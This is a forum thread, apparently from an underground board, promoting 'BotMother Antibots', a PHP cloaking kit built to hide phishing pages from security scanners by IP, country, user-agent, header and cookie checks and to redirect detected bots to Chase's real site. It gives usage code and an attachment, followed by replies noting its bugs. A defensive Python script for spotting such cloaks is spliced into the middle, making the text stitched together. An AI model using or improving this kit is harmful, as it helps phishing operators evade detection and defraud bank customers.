Manual/Book 🤖 BotMother Antibots 🤖

X-splinter (HDD-drive · User · Registered: 20.08.2021 · Posts: 32 · Reactions: 34)
🤖 BotMother Antibots 🤖

🟢BotMother Antibots is used by Phishing Pages to keep Bots away from your Phishing site.

🔑 Features

▶️IP Blocking (Single/Ranges)
▶️Country Blocking
▶️User-Agent Blocking
▶️Cookie Fingerprint (bots don't use cookies)
▶️Header/Agent Deep Checks
▶️Redirection
▶️Logging
▶️Rate Limit Requests (30/minute)
▶️Test Mode for Developer.

👩‍💻 Code Implementation (Assuming the folder is in the current directory as "botMother")

PHP:
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.chase.com/"); / Redirect blocked bots to Chase
$bm->setGeoFilter("de,us,fr,uk"); // Allows Germany, USA, France, UK
$bm->setTestMode(false); // Disable test mode (real IP checks)
$bm->limitRequests(30, 60); // 30 requests/minute
$bm->validateHeaders(); // Check for bots/tools
$bm->checkFingerprint(); // Verify JS support (cookie)
$bm->run();

👍 For an example, check out example.php, use the JavaScript at your Phishing Page, or else don't run "checkFingerprint".

ℹ️ You can put multiple countries on the allow list but also one

Attachments: botMother.zip (9.2 KB · Views: 38)

But how does checkFingerprint(); work?
It will mark everyone as a bot.
1) The browser opens the URL and sends headers (without cookies)
2) The server gives <script>document.cookie = "js_enabled=1; path=/";</script>, now the browser has cookies
3) checkFingerprint(); is looking for cookies in headers without cookies.
Code:
if (empty($_COOKIE['js_enabled'])) {
    $this->killBot("No JS support (likely bot)");
}
In that case everyone is a bot. Or am I missing something?

And GeoFilter is case sensitive: ip-api returns uppercase, the example uses lowercase, so the examples do not work.
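
For defenders triaging crawler captures, the two behaviours described in this thread (the inline script that sets the `js_enabled` cookie, and the redirect of blocked clients to an exit link) can be matched together. This is an added example, not code from the thread or the kit; the capture format, function names and `.example` hostnames are assumptions.

```python
import re
from urllib.parse import urlparse

# Inline script that plants a marker cookie, in the form quoted in the post above.
COOKIE_GATE = re.compile(r"""document\.cookie\s*=\s*["'](?P<name>[\w-]+)=[^"']*["']""")
REDIRECTS = {301, 302, 303, 307, 308}

def host(url):
    return (urlparse(url).hostname or "").lower()

def triage(capture):
    """Findings for one captured response: dict with url, status, headers, body, sent_cookies."""
    findings = []
    headers = {k.lower(): v for k, v in capture["headers"].items()}
    for m in COOKIE_GATE.finditer(capture.get("body", "")):
        findings.append(("js_cookie_gate", m.group("name")))
    # A relative Location has no hostname, so it never counts as off-site.
    target = host(headers.get("location", ""))
    if (capture["status"] in REDIRECTS and target
            and target != host(capture["url"]) and not capture.get("sent_cookies")):
        findings.append(("offsite_redirect_without_cookie", target))
    return findings

def summarize(captures):
    """Group finding kinds per requested host; both kinds together suggest a cookie-gated cloak."""
    per_host = {}
    for cap in captures:
        kinds = per_host.setdefault(host(cap["url"]), set())
        kinds.update(kind for kind, _ in triage(cap))
    both = {"js_cookie_gate", "offsite_redirect_without_cookie"}
    return {h: ("review: cookie-gated cloak" if both <= k else "no cloak pattern")
            for h, k in per_host.items()}

# Constructed sample captures (hostnames are placeholders, not from the thread).
SAMPLE = [
    {"url": "http://portal.example/index.php", "status": 200, "headers": {},
     "body": '<script>document.cookie = "js_enabled=1; path=/";</script>', "sent_cookies": False},
    {"url": "http://portal.example/login.php", "status": 302,
     "headers": {"Location": "https://brand.example/"}, "body": "", "sent_cookies": False},
    {"url": "http://shop.example/", "status": 301,
     "headers": {"Location": "https://shop.example/"}, "body": "", "sent_cookies": False},
]

if __name__ == "__main__":
    for h, verdict in summarize(SAMPLE).items():
        print(h, "->", verdict)
```
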
Please note that this user is banned
A simple filter, aka an imitation of a cloaker. It's just not clear why there is a rate limit here.
Interesting. Maybe I'll improve it and post a decent version with a set of worthy checks publicly)